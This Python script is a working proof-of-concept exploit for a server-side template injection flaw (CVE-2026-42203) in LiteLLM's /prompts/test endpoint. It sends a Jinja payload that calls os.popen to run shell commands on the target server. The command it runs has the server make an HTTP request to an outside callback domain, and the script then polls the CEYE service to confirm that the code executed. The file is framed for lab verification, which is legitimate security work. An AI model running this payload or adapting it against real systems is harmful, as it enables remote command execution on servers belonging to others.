#!/usr/bin/env python3 """ Minimal LiteLLM CVE-2026-42203 /prompts/test SSTI PoC. Proof strategy: Execute Python code that requests: http://{random}.{your-ceye-domain}/ Then query CEYE request records with filter={random}. If CEYE received the callback, the SSTI command execution path is confirmed. CEYE domain/token and the LiteLLM API key are intentionally not hardcoded. Pass them with CLI flags or environment variables when running in your lab. """ from __future__ import annotations import argparse import json import os import secrets import string import sys import threading import time from typing import Any, Dict, Optional import requests DEFAULT_TARGET = "http://127.0.0.1:4000" DEFAULT_MODEL = "gpt-3.5-turbo" DEFAULT_API_KEY_ENV = "LITELLM_API_KEY" DEFAULT_CEYE_DOMAIN_ENV = "CEYE_DOMAIN" DEFAULT_CEYE_TOKEN_ENV = "CEYE_TOKEN" DEFAULT_CEYE_TYPE = "request" DEFAULT_TIMEOUT = 10.0 DEFAULT_WAIT = 20.0 DEFAULT_INTERVAL = 3.0 EXIT_VULNERABLE = 0 EXIT_NOT_VULNERABLE = 1 EXIT_CONFIG_ERROR = 2 EXIT_INCONCLUSIVE = 3 def random_filter(length: int = 12) -> str: alphabet = string.ascii_lowercase + string.digits return "".join(secrets.choice(alphabet) for _ in range(length)) def quote_for_jinja_single_string(value: str) -> str: return value.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n") def build_payload(model: str, command: str) -> Dict[str, Any]: command = quote_for_jinja_single_string(command) ssti = "{{ cycler.__init__.__globals__.os.popen('" + command + "').read() }}" return { "dotprompt_content": f"""--- model: {model} temperature: 0 --- User: {ssti} """, "prompt_variables": {}, } def build_python_http_command(url: str) -> str: return ( "python3 -c " f"\"import urllib.request; urllib.request.urlopen('{url}', timeout=5).read()\"" ) def trigger_payload( target: str, api_key: str, body: Dict[str, Any], timeout: float, verify_tls: bool, ) -> None: endpoint = target.rstrip("/") + "/prompts/test" try: requests.post( endpoint, headers={ "Authorization": f"Bearer {api_key}", "Content-Type": "application/json", }, json=body, timeout=timeout, verify=verify_tls, ) except requests.RequestException as exc: print(f"[!] Background trigger request error: {exc}") def start_trigger_payload( target: str, api_key: str, body: Dict[str, Any], timeout: float, verify_tls: bool, ) -> None: endpoint = target.rstrip("/") + "/prompts/test" thread = threading.Thread( target=trigger_payload, kwargs={ "target": target, "api_key": api_key, "body": body, "timeout": timeout, "verify_tls": verify_tls, }, daemon=True, ) thread.start() print(f"[*] Sending payload to: POST {endpoint}") def query_ceye( token: str, record_type: str, filter_value: str, timeout: float, ) -> Dict[str, Any]: response = requests.get( "http://api.ceye.io/v1/records", params={ "token": token, "type": record_type, "filter": filter_value, }, timeout=timeout, ) response.raise_for_status() return response.json() def ceye_has_callback(data: Dict[str, Any], filter_value: str) -> bool: return filter_value in json.dumps(data, ensure_ascii=False) def poll_ceye( token: str, record_type: str, filter_value: str, wait: float, interval: float, timeout: float, ) -> bool: deadline = time.time() + wait last_error: Optional[str] = None while time.time() <= deadline: try: data = query_ceye(token, record_type, filter_value, timeout) if ceye_has_callback(data, filter_value): print(f"[+] CEYE matched filter: {filter_value}") print(json.dumps(data, ensure_ascii=False, indent=2)) return True except (requests.RequestException, ValueError) as exc: last_error = str(exc) time.sleep(interval) if last_error: print(f"[!] Last CEYE query error: {last_error}") return False def parse_args() -> argparse.Namespace: parser = argparse.ArgumentParser( description="Minimal LiteLLM /prompts/test SSTI PoC with CEYE request callback." ) parser.add_argument("-t", "--target", default=DEFAULT_TARGET, help=f"LiteLLM base URL, default: {DEFAULT_TARGET}") parser.add_argument( "--auth", "--api-key", dest="api_key", default=os.getenv(DEFAULT_API_KEY_ENV, ""), help=f"LiteLLM key allowed to call /prompts/test. Can also be set with {DEFAULT_API_KEY_ENV}.", ) parser.add_argument("--model", default=DEFAULT_MODEL, help=f"dotprompt model value, default: {DEFAULT_MODEL}") parser.add_argument( "--ceye-token", default=os.getenv(DEFAULT_CEYE_TOKEN_ENV, ""), help=f"CEYE API token. Can also be set with {DEFAULT_CEYE_TOKEN_ENV}.", ) parser.add_argument( "--ceye-domain", default=os.getenv(DEFAULT_CEYE_DOMAIN_ENV, ""), help=f"CEYE domain. Can also be set with {DEFAULT_CEYE_DOMAIN_ENV}.", ) parser.add_argument("--ceye-type", default=DEFAULT_CEYE_TYPE, help=f"CEYE record type, default: {DEFAULT_CEYE_TYPE}") parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, help=f"HTTP timeout, default: {DEFAULT_TIMEOUT}s") parser.add_argument("--wait", type=float, default=DEFAULT_WAIT, help=f"Seconds to wait for CEYE callback, default: {DEFAULT_WAIT}s") parser.add_argument("--interval", type=float, default=DEFAULT_INTERVAL, help=f"CEYE polling interval, default: {DEFAULT_INTERVAL}s") parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification for target request") return parser.parse_args() def validate_args(args: argparse.Namespace) -> Optional[str]: if not args.target.strip(): return "--target must not be empty" if not args.api_key.strip(): return "--auth/--api-key must not be empty" if not args.ceye_token.strip(): return "--ceye-token must not be empty" if not args.ceye_domain.strip(): return "--ceye-domain must not be empty" if args.timeout <= 0: return "--timeout must be greater than 0" if args.wait <= 0: return "--wait must be greater than 0" if args.interval <= 0: return "--interval must be greater than 0" return None def main() -> int: args = parse_args() validation_error = validate_args(args) if validation_error: print(f"[CONFIG_ERROR] {validation_error}", file=sys.stderr) return EXIT_CONFIG_ERROR filter_value = random_filter() callback_url = f"http://{filter_value}.{args.ceye_domain}/" command = build_python_http_command(callback_url) body = build_payload(args.model, command) print(f"[*] Python payload: {command}") print( "[*] CEYE query: " f"http://api.ceye.io/v1/records?token={args.ceye_token}&type={args.ceye_type}&filter={filter_value}" ) start_trigger_payload( target=args.target, api_key=args.api_key, body=body, timeout=args.timeout, verify_tls=not args.insecure, ) if poll_ceye( token=args.ceye_token, record_type=args.ceye_type, filter_value=filter_value, wait=args.wait, interval=args.interval, timeout=args.timeout, ): print("[VULNERABLE] CEYE received the callback request.") return EXIT_VULNERABLE print("[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.") return EXIT_NOT_VULNERABLE if __name__ == "__main__": raise SystemExit(main())